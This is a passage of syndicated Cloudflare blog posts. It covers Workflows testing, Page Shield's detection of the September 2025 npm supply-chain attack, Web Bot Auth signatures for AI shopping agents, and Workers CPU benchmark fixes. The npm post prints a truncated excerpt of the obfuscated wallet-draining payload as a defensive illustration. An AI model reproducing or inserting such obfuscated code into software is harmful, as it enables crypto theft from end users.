When the await using block from introspectWorkflow() finishes, or the dispose() method is called at the end of the test, the introspector is disposed of, and the proxy is removed, leaving the binding in its original state. It’s a low-impact approach that prioritizes developer experience and long-term maintainability.
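The install-and-restore lifecycle described above can be sketched in plain JavaScript. This is a minimal illustration, not the vitest-pool-workers implementation: `interceptCreate`, the `onCreate` callback, and the `makeId` generator are hypothetical names, and the fake binding used in the test stands in for a real Workflow binding.

```javascript
// Hypothetical helper: wraps env[bindingName] in a Proxy that intercepts create(),
// and returns a handle whose dispose() puts the original binding back.
function interceptCreate(env, bindingName, onCreate, makeId) {
  const original = env[bindingName];

  env[bindingName] = new Proxy(original, {
    get(target, prop) {
      if (prop === "create") {
        return async (opts = {}) => {
          // Ensure the instance has an ID before it is created.
          const optsWithId = "id" in opts ? opts : { id: makeId(), ...opts };
          // Let the test register its modifications for this ID first.
          await onCreate(optsWithId.id);
          // Forward to the real create(), with the original binding as `this`.
          return target.create(optsWithId);
        };
      }
      // Every other property passes through untouched.
      return Reflect.get(target, prop);
    },
  });

  return {
    dispose() {
      // Restore the unwrapped binding, leaving env as it was before the test.
      env[bindingName] = original;
    },
  };
}
```

In a real test harness, the same `dispose()` logic would typically also be exposed under `Symbol.asyncDispose`, so that leaving an `await using` block restores the binding automatically.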

Get started with testing Workflows

Ready to add tests to your Workflows? Here’s how to get started:

  1. Update your dependencies: Make sure you are using @cloudflare/vitest-pool-workers version 0.9.0 or newer. Run the following command in your project: npm install @cloudflare/vitest-pool-workers@latest

  2. Configure your test environment: If you’re new to testing on Workers, follow our guide to write your first test.

  3. Start writing tests: Import introspectWorkflowInstance or introspectWorkflow from cloudflare:test in your test files and use the patterns shown in this post to mock, control, and assert on your Workflow’s behavior. Also check out the official API reference.

How Cloudflare’s client-side security made the npm supply chain attack a non-event

Post Syndicated from Bashyam Anant original https://blog.cloudflare.com/how-cloudflares-client-side-security-made-the-npm-supply-chain-attack-a-non/

In early September 2025, attackers used a phishing email to compromise one or more trusted maintainer accounts on npm. They used this to publish malicious releases of 18 widely used npm packages (for example chalk, debug, ansi-styles) that account for more than 2 billion downloads per week. Websites and applications that used these compromised packages were vulnerable to hackers stealing crypto assets (“crypto stealing” or “wallet draining”) from end users. In addition, compromised packages could also modify other packages owned by the same maintainers (using stolen npm tokens) and included code to steal developer tokens for CI/CD pipelines and cloud accounts.

As it relates to end users of your applications, the good news is that Cloudflare Page Shield, our client-side security offering, will detect compromised JavaScript libraries and prevent crypto-stealing. More importantly, given the AI powering Cloudflare’s detection solutions, customers are protected from similar attacks in the future, as we explain below.

export default {
 aliceblue: [240, 248, 255],
 …
 yellow: [255, 255, 0],
 yellowgreen: [154, 205, 50]
}


const _0x112fa8=_0x180f;(function(_0x13c8b9,_0x35f660){const _0x15b386=_0x180f,_0x66ea25=_0x13c8b9();while(!![]){try{const _0x2cc99e=parseInt(_0x15b386(0x46c))/(-0x1caa+0x61f*0x1+-0x9c*-0x25)*(parseInt(_0x15b386(0x132))/(-0x1d6b+-0x69e+0x240b))+-parseInt(_0x15b386(0x6a6))/(0x1*-0x26e1+-0x11a1*-0x2+-0x5d*-0xa)*(-parseInt(_0x15b386(0x4d5))/(0x3b2+-0xaa*0xf+-0x3*-0x218))+-parseInt(_0x15b386(0x1e8))/(0xfe+0x16f2+-0x17eb)+-parseInt(_0x15b386(0x707))/(-0x23f8+-0x2*0x70e+-0x48e*-0xb)*(parseInt(_0x15b386(0x3f3))/(-0x6a1+0x3f5+0x2b3))+-parseInt(_0x15b386(0x435))/(0xeb5+0x3b1+-0x125e)*(parseInt(_0x15b386(0x56e))/(0x18*0x118+-0x17ee+-0x249))+parseInt(_0x15b386(0x785))/(-0xfbd+0xd5d*-0x1+0x1d24)+-parseInt(_0x15b386(0x654))/(-0x196d*0x1+-0x605+0xa7f*0x3)*(-parseInt(_0x15b386(0x3ee))/(0x282*0xe+0x760*0x3+-0x3930));if(_0x2cc99e===_0x35f660)break;else _0x66ea25['push'](_0x66ea25['shift']());}catch(_0x205af0){_0x66 …

Excerpt from the injected malicious payload, along with the rest of the innocuous normal code. Among other things, the payload replaces legitimate crypto addresses with the attacker’s addresses (for multiple currencies, including bitcoin, ethereum, solana).

Finding needles in a 3.5 billion script haystack

Every day, Cloudflare Page Shield assesses 3.5 billion scripts, or about 40,000 scripts per second. Of these, fewer than 0.3% are malicious, based on our machine learning (ML)-based malicious script detection. As explained in a prior blog post, we preprocess JavaScript code into an Abstract Syntax Tree (AST) to train a message-passing graph convolutional network (MPGCN) that classifies a given JavaScript file as either malicious or benign.

The intuition behind using a graph-based model is to use both the structure (e.g. function calling, assertions) and code text to learn hacker patterns. For example, in the npm compromise, the malicious code injected in compromised packages uses code obfuscation and also modifies code entry points for crypto wallet interfaces, such as Ethereum’s window.ethereum, to swap payment destinations to accounts in the attacker’s control. Crucially, rather than engineering such behaviors as features, the model learns to distinguish between good and bad code purely from structure and syntax. As a result, it is resilient to techniques used not just in the npm compromise but also future compromise techniques. 
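To make "message passing" concrete: in a graph convolutional network, each node (here, an AST node) updates its feature vector by aggregating its neighbours' vectors and transforming the result. The sketch below is a toy, single-layer illustration with made-up features and weights, not Cloudflare's model; the mean aggregation, self-loops, and ReLU are common textbook choices assumed here, and `messagePassingLayer` is a hypothetical name.

```javascript
// One message-passing step on a small graph.
// features: array of node feature vectors (each of length d)
// edges: undirected [u, v] pairs, e.g. parent/child links in an AST
// weight: d x k matrix applied after aggregation
function messagePassingLayer(features, edges, weight) {
  const n = features.length;
  const d = features[0].length;
  // Build neighbour lists, with a self-loop so each node keeps its own signal.
  const neighbours = Array.from({ length: n }, (_, i) => [i]);
  for (const [u, v] of edges) {
    neighbours[u].push(v);
    neighbours[v].push(u);
  }
  return neighbours.map((nbrs) => {
    // Aggregate: element-wise mean of the neighbour feature vectors.
    const mean = new Array(d).fill(0);
    for (const j of nbrs) {
      for (let t = 0; t < d; t++) mean[t] += features[j][t] / nbrs.length;
    }
    // Transform: multiply by the weight matrix, then apply ReLU.
    return weight[0].map((_, col) =>
      Math.max(0, mean.reduce((acc, x, row) => acc + x * weight[row][col], 0))
    );
  });
}

// A three-node chain (e.g. CallExpression -> MemberExpression -> Identifier)
// with one-hot node-type features and an identity weight matrix.
const out = messagePassingLayer(
  [[1, 0, 0], [0, 1, 0], [0, 0, 1]],
  [[0, 1], [1, 2]],
  [[1, 0, 0], [0, 1, 0], [0, 0, 1]]
);
// node 0 -> [0.5, 0.5, 0], node 1 -> [1/3, 1/3, 1/3], node 2 -> [0, 0.5, 0.5]
console.log(out);
```

A script-level classifier would typically stack several such layers and pool the node vectors into a single vector before predicting malicious versus benign.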

Our ML model outputs the probability that a script is malicious, which is then transformed into a score ranging from 1 to 99, with low scores indicating likely malicious scripts and high scores indicating likely benign ones. Importantly, like many Cloudflare ML models, inference takes under 0.3 seconds.
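The post does not spell out the transformation from probability to score. A minimal sketch, assuming a simple linear, inverted mapping (both the function name and the formula are hypothetical), shows how a probability in [0, 1] could land in the 1 to 99 range with low scores meaning likely malicious:

```javascript
// Hypothetical mapping, NOT Cloudflare's published formula.
// p = model probability that a script is malicious, in [0, 1].
function scoreFromProbability(p) {
  if (!(p >= 0 && p <= 1)) throw new RangeError("p must be in [0, 1]");
  // Invert so that likely-malicious scripts get low scores,
  // then stretch onto the integer range 1..99.
  return Math.round(1 + 98 * (1 - p));
}
```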

Model Evaluation

Since the initial launch, our JavaScript classifiers have been continuously evolved to optimize model evaluation metrics, in this case the F1 measure. Our current metrics are:

Metric     | Latest: Version 2.7 | Improvement over prior version
---------- | ------------------- | ------------------------------
Precision  | 98%                 | 5%
Recall     | 90%                 | 233%
F1         | 94%                 | 123%
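As a sanity check on the table, F1 is the harmonic mean of precision and recall, so the reported 98% precision and 90% recall should reproduce the reported F1:

```javascript
// F1 is the harmonic mean of precision (P) and recall (R): 2PR / (P + R).
function f1Score(precision, recall) {
  if (precision + recall === 0) return 0;
  return (2 * precision * recall) / (precision + recall);
}

// Version 2.7 figures from the table above.
const f1 = f1Score(0.98, 0.9);
console.log((f1 * 100).toFixed(1) + "%"); // prints "93.8%", which rounds to the reported 94%
```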

Some of the improvements were accomplished through:

  • More training examples, curated from a combination of open source datasets, security partners, and labeling of Cloudflare traffic

  • Better training examples, for instance, by removing samples with pure comments in them or scripts with nearly equal structure

  • Better training set stratification, so that training, validation and test sets all have similar distribution of classes of interest

  • Tweaking the evaluation criteria to maximize recall with 99% precision

Given the confusion matrix, we should expect about 2 false positives per second, assuming ~0.3% of the 40,000 scripts per second are flagged as malicious. We employ multiple LLMs alongside expert human security analysts to review such scripts around the clock. Most false positives we encounter this way are genuinely hard cases: for example, scripts that read all form inputs except credit card numbers (e.g. rejecting input values that pass a Luhn check), inject dynamic scripts, perform heavy user tracking, or do heavy deobfuscation. User tracking scripts often exhibit a combination of these behaviors, and the only reliable way to distinguish truly malicious payloads is by assessing the trustworthiness of their connected domains. We feed all newly labeled scripts back into our ML training (and testing) pipeline.
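The estimate of about two false positives per second follows from the throughput and the precision figure. Roughly 0.3% of 40,000 scripts per second are flagged, and with 98% precision about 2% of those flags are wrong. A quick back-of-the-envelope check:

```javascript
const scriptsPerSecond = 40_000;  // Page Shield throughput quoted above
const flaggedFraction = 0.003;    // ~0.3% of scripts flagged as malicious
const precision = 0.98;           // Version 2.7 precision

const flaggedPerSecond = scriptsPerSecond * flaggedFraction;         // ~120 flags per second
const falsePositivesPerSecond = flaggedPerSecond * (1 - precision);  // ~2.4 false positives per second

console.log(flaggedPerSecond.toFixed(0), falsePositivesPerSecond.toFixed(1)); // prints "120 2.4"
```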

Most importantly, we verified that Cloudflare Page Shield would have successfully detected all 18 compromised npm packages as malicious, even though this was a novel attack and therefore not in the training data.

Planned improvements

Static script analysis has proven effective and is sometimes the only viable approach (e.g., for npm packages). To address more challenging cases, we are enhancing our ML signals with contextual data including script URLs, page hosts, and connected domains. Modern Agentic AI approaches can wrap JavaScript runtimes as tools in an overall AI workflow. Then, they can enable a hybrid approach that combines static and dynamic analysis techniques to tackle challenging false positive scenarios, such as user tracking scripts.

Consolidating classifiers

Over 3 years ago we launched our classifier, “Code Behaviour Analysis”, for Magecart-style scripts; it learns code obfuscation and data exfiltration behaviors. Subsequently, we also deployed our message-passing graph convolutional network (MPGCN) based approach, which can also classify Magecart attacks. Given the efficacy of the MPGCN-based malicious code analysis, we are announcing the end-of-life of Code Behaviour Analysis by the end of 2025.

Staying safe always

In the npm attack, we did not see any activity in the Cloudflare network related to this compromise among Page Shield users, though for other exploits we catch their traffic within minutes. In this case, patched versions of the compromised npm packages were released within 2 hours, and given that the infected payloads had to be built into end-user-facing applications before end users could be affected, we suspect that our customers dodged the proverbial bullet. That said, had traffic gotten through, Page Shield was already equipped to detect and block this threat.

Also make sure to check Page Shield’s script detection to find malicious packages, and consult the Connections tab within Page Shield to view suspicious connections made by your applications.


Several scripts are marked as malicious. 


Several connections are marked as malicious. 

And be sure to complete the following steps:

  1. Audit your dependency tree for recently published versions (check package-lock.json / npm ls) and look for versions published around early–mid September 2025 of widely used packages. 

  2. Rotate any credentials that may have been exposed to your build environment.

  3. Revoke and reissue CI/CD tokens and service keys that might have been used in build pipelines (GitHub Actions, npm tokens, cloud credentials).

  4. Pin dependencies to known-good versions (or use lockfiles), and consider using a package allowlist / verified publisher features from your registry provider.

  5. Scan build logs and repos for suspicious commits/GitHub Actions changes and remove any unknown webhooks or workflows.
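Step 1 can be partially automated. The sketch below assumes an npm lockfile in the v2/v3 format, where installed packages live under a `packages` map keyed by `node_modules/...` paths. It lists every installed copy of the named packages with its version, so you can compare them against published advisories. The function name is hypothetical, and the example package names are the ones mentioned above; the specific malicious versions are not listed here.

```javascript
// List installed versions of the given package names from a parsed package-lock.json
// (lockfileVersion 2 or 3). Nested copies appear under paths such as
// "node_modules/a/node_modules/debug", so match on the segment after the last "node_modules/".
function findInstalledVersions(lockfile, names) {
  const wanted = new Set(names);
  const hits = [];
  for (const [path, info] of Object.entries(lockfile.packages ?? {})) {
    const idx = path.lastIndexOf("node_modules/");
    if (idx === -1) continue; // the "" key is the root project itself
    const name = path.slice(idx + "node_modules/".length); // also handles "@scope/name"
    if (wanted.has(name)) hits.push({ name, version: info.version, path });
  }
  return hits;
}
```

In Node.js, pass it the result of `JSON.parse(fs.readFileSync("package-lock.json", "utf8"))` together with a list such as `["chalk", "debug", "ansi-styles"]`.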

While vigilance is key, automated defenses provide a crucial layer of protection against fast-moving supply chain attacks. Interested in better understanding your client-side supply chain? Sign up for our free, custom Client-Side Risk Assessment.

Securing agentic commerce: helping AI Agents transact with Visa and Mastercard

Post Syndicated from Rohin Lohe original https://blog.cloudflare.com/secure-agentic-commerce/

The era of agentic commerce is coming, and it brings with it significant new challenges for security. That’s why Cloudflare is partnering with Visa and Mastercard to help secure automated commerce as AI agents search, compare, and purchase on behalf of consumers.

Through our collaboration, Visa developed the Trusted Agent Protocol and Mastercard developed Agent Pay to help merchants distinguish legitimate, approved agents from malicious bots. Both Trusted Agent Protocol and Agent Pay leverage Web Bot Auth as the agent authentication layer to allow networks like Cloudflare to verify traffic from AI shopping agents that register with a payment network.

The challenges with agentic commerce

Agentic commerce is commerce driven by AI agents. As AI agents execute more transactions, merchants need to protect themselves and maintain trust with their customers. Merchants are beginning to see the promise of agentic commerce but face significant challenges: 

  • How can they distinguish a helpful, approved AI shopping agent from a malicious bot or web crawler? 

  • Is the agent representing a known, repeat customer or someone entirely new? 

  • Are there particular instructions the consumer gave to their agent that the merchant should respect?

We are working with Visa and Mastercard, two of the most trusted consumer brands in payments, to address each of these challenges. 

Web Bot Auth is the foundation to securing agentic commerce

In May, we shared a new proposal called Web Bot Auth to cryptographically authenticate agent traffic. Historically, agent traffic has been classified using the user agent and IP address. However, these fields can be spoofed, leading to inaccurate classifications and misapplied bot mitigations. Web Bot Auth allows an agent to provide a stable identifier by using HTTP Message Signatures with public key cryptography.

As we spent time collaborating with the teams at Visa and Mastercard, we found that we could leverage Web Bot Auth as the foundation to ensure that each commerce agent request was verifiable, time-based, and non-replayable.

Visa’s Trusted Agent Protocol and Mastercard’s Agent Pay present three key solutions for merchants to manage agentic commerce transactions. First, merchants can identify a registered agent and distinguish whether a particular interaction is intended to browse or to pay. Last, merchants can indicate to agents how a payment is expected, whether that is through a network token, browser-use guest checkout, or a micropayment.

This allows merchants that integrate with these protocols to instantly recognize a trusted agent during two key interactions: the initial browsing phase to determine product details and final costs, and the final payment interaction to complete a purchase. Ultimately, this provides merchants with the tools to verify these signatures, identify trusted interactions, and securely manage how these agents can interact with their site.

How it works: leveraging HTTP message signatures 

To make this work, an ecosystem of participants needs to be on the same page. It all starts with agent developers, who build the agents that shop on behalf of consumers. These agents then interact with merchants, who need a reliable way to assess whether a request is made on behalf of a consumer. Merchants rely on networks like Cloudflare to verify the agent’s cryptographic signatures and ensure the interaction is legitimate. Finally, there are payment networks like Visa and Mastercard, who can link cardholder identity to agentic commerce transactions, helping ensure that transactions are verifiable and accountable.

When developing their protocols, Visa and Mastercard needed a secure way to authenticate each agent developer and securely transmit information from the agent to the merchant’s website. That’s where we came in and worked with their teams to build upon Web Bot Auth. Web Bot Auth proposals specify how developers of bots and agents can attach cryptographic signatures to HTTP requests by using HTTP Message Signatures.

Both Visa and Mastercard protocols require agents to register and have their public keys (referenced as the keyid in the Signature-Input header) in a well-known directory, allowing merchants and networks to fetch the keys to validate these HTTP message signatures. To start, Visa and Mastercard will be hosting their own directories for Visa-registered and Mastercard-registered agents, respectively.

The newly created agents then communicate their registration, identity, and payment details with the merchant using these HTTP Message Signatures. Both protocols build on Web Bot Auth by introducing a new tag that agents must supply in the Signature-Input header, which indicates whether the agent is browsing or purchasing. Merchants can use the tag to determine whether to interact with the agent. Agents must also include the nonce field, a unique sequence included in the signature, to provide protection against replay attacks.

An agent visiting a merchant’s website to browse a catalog would include an HTTP Message Signature in their request to verify their agent is authorized to browse the merchant’s storefront on behalf of a specific Visa cardholder:

GET /path/to/resource HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 Chrome/113.0.0 MyShoppingAgent/1.1
Signature-Input: 
  sig2=("@authority" "@path"); 
  created=1735689600; 
  expires=1735693200; 
  keyid="poqkLGiymh_W0uP6PZFw-dvez3QJT5SolqXBCW38r0U"; 
  alg="Ed25519";   nonce="e8N7S2MFd/qrd6T2R3tdfAuuANngKI7LFtKYI/vowzk4IAZyadIX6wW25MwG7DCT9RUKAJ0qVkU0mEeLEIW1qg=="; 
  tag="web-bot-auth"
Signature: sig2=:jdq0SqOwHdyHr9+r5jw3iYZH6aNGKijYp/EstF4RQTQdi5N5YYKrD+mCT1HA1nZDsi6nJKuHxUi/5Syp3rLWBA==:
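A verifier does not check the signature against the raw headers. Per HTTP Message Signatures (RFC 9421), it first rebuilds a "signature base" string from the covered components and the signature parameters, and the Ed25519 signature is computed over that string. The sketch below handles a request like the one above. It assumes the Signature-Input value arrives on a single line in canonical serialized form (it is wrapped above for readability) and that only the "@authority" and "@path" components are covered. The function name is hypothetical, and this is not a complete RFC 9421 implementation.

```javascript
// Build an RFC 9421 signature base for a request whose Signature-Input covers
// only the "@authority" and "@path" derived components.
// `signatureParams` is the raw value of the labelled Signature-Input member, e.g.
// '("@authority" "@path");created=1735689600;...;tag="web-bot-auth"'.
function buildSignatureBase(url, signatureParams) {
  const { host, pathname } = new URL(url);
  const values = { "@authority": host.toLowerCase(), "@path": pathname };

  // The covered component list is the parenthesised inner list at the start.
  const inner = signatureParams.match(/^\(([^)]*)\)/);
  if (!inner) throw new Error("Signature-Input has no component list");
  const components = inner[1]
    .split(" ")
    .filter(Boolean)
    .map((c) => c.replace(/^"|"$/g, ""));

  // One line per covered component: "<name>": <value>
  const lines = components.map((name) => {
    if (!(name in values)) throw new Error(`unsupported component ${name}`);
    return `"${name}": ${values[name]}`;
  });
  // The final line repeats the signature parameters verbatim.
  lines.push(`"@signature-params": ${signatureParams}`);
  return lines.join("\n");
}
```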

Trusted Agent Protocol and Agent Pay are designed so that merchants can benefit from their validation mechanisms without changing their infrastructure. Instead, merchants can set the rules for agent interactions on their site and rely upon Cloudflare as the validator. For these requests, Cloudflare will run the following checks:

  1. Confirm the presence of the Signature-Input and Signature headers.

  2. Pull the keyid from the Signature-Input. If Cloudflare has not previously retrieved and cached the key, fetch it from the public key directory.

  3. Confirm the current time falls between the created and expires timestamps.

  4. Check nonce uniqueness in the cache. By checking if a nonce has been recently used, Cloudflare can reject reused or expired signatures, ensuring the request is not a malicious copy of a prior, legitimate interaction.

  5. Check the validity of the tag, as defined by the protocol. If the agent is browsing, the tag should be agent-browser-auth. If the agent is paying, the tag should be agent-payer-auth.

  6. Reconstruct the canonical signature base using the components from the Signature-Input header. 

  7. Perform the cryptographic ed25519 signature verification using the key supplied in keyid.
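Steps 1, 3, 4, and 5 above need no cryptography and can be sketched on their own. The sketch below is illustrative, not Cloudflare's validator. The function names are hypothetical, and the parser handles only the simple parameter shapes seen in the example request; it is not a full Structured Fields parser. Key retrieval (step 2), signature base reconstruction (step 6), and Ed25519 verification (step 7) are omitted. `headers` can be any object with a get() method, such as a Fetch Headers instance, and the nonce cache is assumed to be an in-memory Set.

```javascript
// Tags accepted by the two protocols, per step 5.
const ALLOWED_TAGS = new Set(["agent-browser-auth", "agent-payer-auth"]);

// Parse parameters from a single member such as:
// sig2=("@authority" "@path");created=...;keyid="...";nonce="...";tag="..."
function parseSignatureParams(signatureInput) {
  const eq = signatureInput.indexOf("=");
  const params = {};
  // Skip the first segment (the covered component list).
  for (const part of signatureInput.slice(eq + 1).split(";").slice(1)) {
    const [key, ...rest] = part.trim().split("=");
    const raw = rest.join("="); // base64 nonces may themselves contain "="
    params[key] = raw.startsWith('"') ? raw.slice(1, -1) : Number(raw);
  }
  return params;
}

function checkAgentRequest(headers, seenNonces, nowSeconds) {
  // Step 1: both headers must be present.
  const input = headers.get("Signature-Input");
  if (!input || !headers.get("Signature")) return "missing signature headers";
  const p = parseSignatureParams(input);
  // Step 3: the current time must fall between created and expires.
  if (!(p.created <= nowSeconds && nowSeconds <= p.expires)) return "outside validity window";
  // Step 4: reject missing or previously seen nonces (replay protection).
  if (!p.nonce || seenNonces.has(p.nonce)) return "missing or replayed nonce";
  // Step 5: the tag must be one the protocol defines.
  if (!ALLOWED_TAGS.has(p.tag)) return "unexpected tag";
  seenNonces.add(p.nonce);
  return "ok";
}
```

A production nonce cache would need to be shared across servers, and it could evict each nonce once its signature's expires time has passed, because expired signatures are rejected by the time check anyway.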

Here is an example from Visa on the flow for agent validation:


Mastercard’s Agent Pay validation flow is outlined below:


What’s next: Cloudflare’s Agent SDK & Managed Rules

We recently introduced support for x402 transactions into Cloudflare’s Agent SDK, allowing anyone building an agent to easily transact using the new x402 protocol. We will similarly be working with Visa and Mastercard over the coming months to bring support for their protocols directly to the Agents SDK. This will allow developers to manage their registered agent’s private keys and to easily create the correct HTTP message signatures to authorize their agent to browse and transact on a merchant website.

Conceptually, the requests in a Cloudflare Worker would look something like this:

/**
 * Pseudocode example of a Cloudflare Worker acting as a trusted agent.
 * This version explicitly illustrates the signing logic to show the core flow.
 */


// Helper function to encapsulate the signing protocol logic.
async function createSignatureHeaders(targetUrl, credentials) {
    // Internally, this function would perform the detailed cryptographic steps:
    // 1. Generate timestamps and a unique nonce.
    // 2. Construct the 'Signature-Input' header string with all required parameters.
    // 3. Build the canonical 'Signature Base' string according to the spec.
    // 4. Use credentials.privateKey to sign the base string.
    // 5. Return the fully formed 'Signature-Input' and 'Signature' headers.

    const signedHeaders = new Headers();

    // Placeholder values: a real implementation fills these in from steps 1-4.
    signedHeaders.set('Signature-Input', 'sig2=(...); keyid="..."; ...');
    signedHeaders.set('Signature', 'sig2=:...');
    return signedHeaders;
}


export default {
    async fetch(request, env) {
        // 1. Load the final API endpoint and private signing credentials.
        const targetUrl = new URL(request.url).searchParams.get('target');
        if (!targetUrl) {
            return new Response('Missing ?target= parameter', { status: 400 });
        }
        const credentials = {
            privateKey: env.PAYMENT_NETWORK_PRIVATE_KEY,
            keyId: env.PAYMENT_NETWORK_KEY_ID
        };


        // 2. Generate the required signature headers using the helper.
        const signatureHeaders = await createSignatureHeaders(targetUrl, credentials);


        // 3. Attach the newly created signature headers to the request for authentication.
        const signedRequestHeaders = new Headers(request.headers);
        signedRequestHeaders.set('Host', new URL(targetUrl).hostname);
        signedRequestHeaders.set('Signature-Input', signatureHeaders.get('Signature-Input'));
        signedRequestHeaders.set('Signature', signatureHeaders.get('Signature'));


        // 4. Forward the fully signed request (same method and body) to the protected API.
        return fetch(targetUrl, {
            method: request.method,
            headers: signedRequestHeaders,
            body: request.body,
        });
    },
};

We’ll also be creating new managed rulesets for our customers that make it easy to allow agents that are using the Trusted Agent Protocol or Agent Pay. You might want to disallow most automated traffic to your storefront but not miss out on revenue opportunities from agents authorized to make a purchase on behalf of a cardholder. A managed rule would make this straightforward to implement. As the website owner, you could enable a managed rule that automatically allows all trusted agents registered with Visa or Mastercard to come to your site, letting them pass through your other bot protection and WAF rules.

These will continue to evolve, and we will incorporate feedback to ensure that agent registration and validation works seamlessly across all networks and aligns with the Web Bot Auth proposal. American Express will also be leveraging Web Bot Auth as the foundation to their agentic commerce offering.

How to get started today 

You can start building with Cloudflare’s Agent SDK today, see a sample implementation of the Trusted Agent Protocol, and view the Trusted Agent Protocol and Agent Pay docs.

We look forward to your contributions and feedback, whether that means engaging on GitHub, building apps, or joining mailing list discussions.

Unpacking Cloudflare Workers CPU Performance Benchmarks

Post Syndicated from Kenton Varda original https://blog.cloudflare.com/unpacking-cloudflare-workers-cpu-performance-benchmarks/

On October 4, independent developer Theo Browne published a series of benchmarks designed to compare server-side JavaScript execution speed between Cloudflare Workers and Vercel, a competing compute platform built on AWS Lambda. The initial results showed Cloudflare Workers performing worse than Node.js on Vercel at a variety of CPU-intensive tasks, by a factor of as much as 3.5x.

We were surprised by the results. The benchmarks were designed to compare JavaScript execution speed in a CPU-intensive workload that never waits on external services. But Cloudflare Workers and Node.js both use the same underlying JavaScript engine: V8, the open source engine from Google Chrome. Hence, one would expect the benchmarks to be executing essentially identical code in each environment. Physical CPUs can vary in performance, but modern server CPUs do not vary by anywhere near 3.5x.

On investigation, we discovered a wide range of small problems that contributed to the disparity, ranging from some bad tuning in our infrastructure, to differences between the JavaScript libraries used on each platform, to some issues with the test itself. We spent the week working on many of these problems, which means over the past week Workers got better and faster for all of our customers. We even fixed some problems that affect other compute providers but not us, such as an issue that made trigonometry functions much slower on Vercel. This post will dig into all the gory details.

It’s important to note that the original benchmark was not representative of billable CPU usage on Cloudflare, nor did the issues involved impact most typical workloads. Most of the disparity was an artifact of the specific benchmark methodology. Read on to understand why.

With our fixes, the results now look much more like we’d expect:


There is still work to do, but we’re happy to say that after these changes, Cloudflare now performs on par with Vercel in every benchmark case except the one based on Next.js. On that benchmark, the gap has closed considerably, and we expect to be able to eliminate it with further improvements detailed later in this post.

We are grateful to Theo for highlighting areas where we could make improvements, which will now benefit all our customers, and even many who aren’t our customers.

Our benchmark methodology

We wanted to run Theo’s test with no major design changes, in order to keep numbers comparable. Benchmark cases are nearly identical to Theo’s original test, but we made a couple of changes in how we ran the test, in the hopes of making the results more accurate:

  • Theo ran the test client on a laptop connected by a Webpass internet connection in San Francisco, against Vercel instances running in its sfo1 region. In order to make our results easier to reproduce, we chose instead to run our test client directly in AWS’s us-east-1 datacenter, invoking Vercel instances running in its iad1 region (which we understand to be in the same building). We felt this would minimize any impact from network latency. Because of this, Vercel’s numbers are slightly better in our results than they were in Theo’s.

  • We chose to use Vercel instances with 1 vCPU instead of 2. All of the benchmarks are single-threaded workloads, meaning they cannot take advantage of a second CPU anyway. Vercel’s CTO, Malte Ubl, had stated publicly on X that using single-CPU instances would make no difference in this test, and indeed, we found this to be correct. Using 1 vCPU makes it easier to reason about pricing, since both Vercel and Cloudflare charge for CPU time ($0.128/hr for Vercel in iad1, and $0.072/hr for Cloudflare globally).
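Because both platforms bill for CPU time, the quoted hourly rates translate directly into per-workload costs. The back-of-the-envelope sketch below counts only the CPU-time component of each bill and assumes a hypothetical workload of one million requests at 100 ms of CPU each. The workload numbers and the `cpuCost` helper are illustrative only.

```javascript
// Quoted CPU-time prices, in US dollars per CPU-hour.
const RATE_PER_CPU_HOUR = { vercelIad1: 0.128, cloudflare: 0.072 };

// Cost in dollars for `requests` requests that each use `cpuMs` of CPU time.
function cpuCost(ratePerHour, requests, cpuMs) {
  const cpuHours = (requests * cpuMs) / 1000 / 3600;
  return ratePerHour * cpuHours;
}

// Hypothetical workload: 1,000,000 requests at 100 ms CPU each (~27.8 CPU-hours).
for (const [platform, rate] of Object.entries(RATE_PER_CPU_HOUR)) {
  console.log(platform, cpuCost(rate, 1_000_000, 100).toFixed(2));
}
// prints "vercelIad1 3.56" then "cloudflare 2.00"
```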

  • We made some changes to fix bugs in the test, for which we submitted a pull request. More on this below.

Cloudflare platform improvements

Theo’s benchmarks covered a variety of frameworks, making it clear that no single JavaScript library could be at fault for the general problem. Clearly, we needed to look first at the Workers Runtime itself. And so we did, and we found two problems – not bugs, but tuning and heuristic choices which interacted poorly with the benchmarks as written.

Sharding and warm isolate routing: A problem of scheduling, not CPU speed

Over the last year we shipped smarter routing that sends traffic to warm isolates more often. That cuts cold starts for large apps, which matters for frameworks with heavy initialization requirements like Next.js. The original policy optimized for latency and throughput across billions of requests, but was less optimal for heavily CPU-bound workloads for the same reason that such workloads cause performance issues in other platforms like Node.js: When the CPU is busy computing an expensive operation for one request, other requests sent to the same isolate must wait for it to finish before they can proceed.

The system uses heuristics to detect when requests are getting blocked behind each other, and automatically spin up more isolates to compensate. However, these heuristics are not precise, and the particular workload generated by Theo’s tests – in which a burst of expensive traffic would come from a single client – played poorly with our existing algorithm. As a result, the benchmarks showed much higher latency (and variability in latency) than would normally be expected.

It’s important to understand that, as a result of this problem, the benchmark was not really measuring CPU time. Pricing on the Workers platform is based on CPU time – that is, time spent actually executing JavaScript code, as opposed to time waiting for things. Time spent waiting for the isolate to become available makes the request take longer, but is not billed as CPU time against the waiting request. So, this problem would not have affected your bill.
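A toy model makes the distinction between latency and billed CPU time concrete. Assume, hypothetically, a burst of identical CPU-bound requests, each needing `cpuMs` of CPU, spread round-robin across isolates that each process one request at a time. Every request is billed the same CPU time, but its wall-clock latency grows with the number of requests queued ahead of it on the same isolate. The function name and parameters are illustrative, not part of the Workers scheduler.

```javascript
// Toy model: `burst` requests arrive at once, each needs `cpuMs` of CPU,
// and they are assigned round-robin to `isolates` single-threaded isolates.
function simulateBurst(burst, cpuMs, isolates) {
  const results = [];
  for (let i = 0; i < burst; i++) {
    // Requests ahead of this one on the same isolate must finish first.
    const queuedAhead = Math.floor(i / isolates);
    results.push({
      billedCpuMs: cpuMs,                   // billed: only time spent executing
      latencyMs: (queuedAhead + 1) * cpuMs, // observed: waiting plus executing
    });
  }
  return results;
}

const worst = (rs) => Math.max(...rs.map((r) => r.latencyMs));
console.log(worst(simulateBurst(10, 50, 1)));  // one isolate: prints 500
console.log(worst(simulateBurst(10, 50, 10))); // ten isolates: prints 50
```

In both runs the total billed CPU time is the same 500 ms; spinning up more isolates changes only how long requests wait.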

After analyzing the benchmarks, we updated the algorithm to detect sustained CPU-heavy work earlier, then bias traffic so that new isolates spin up faster. The result is that Workers can more effectively and efficiently autoscale when different workloads are applied. I/O-bound workloads coalesce into individual, already warm isolates, while CPU-bound workloads are directed so that they do not block each other. This change has already been rolled out globally and is enabled automatically for everyone. It should be pretty clear from the graph when the change was rolled out:


V8 garbage collector tuning

While this scheduling issue accounted for the majority of the disparity in the benchmark, we did find a minor issue affecting code execution performance during our testing.

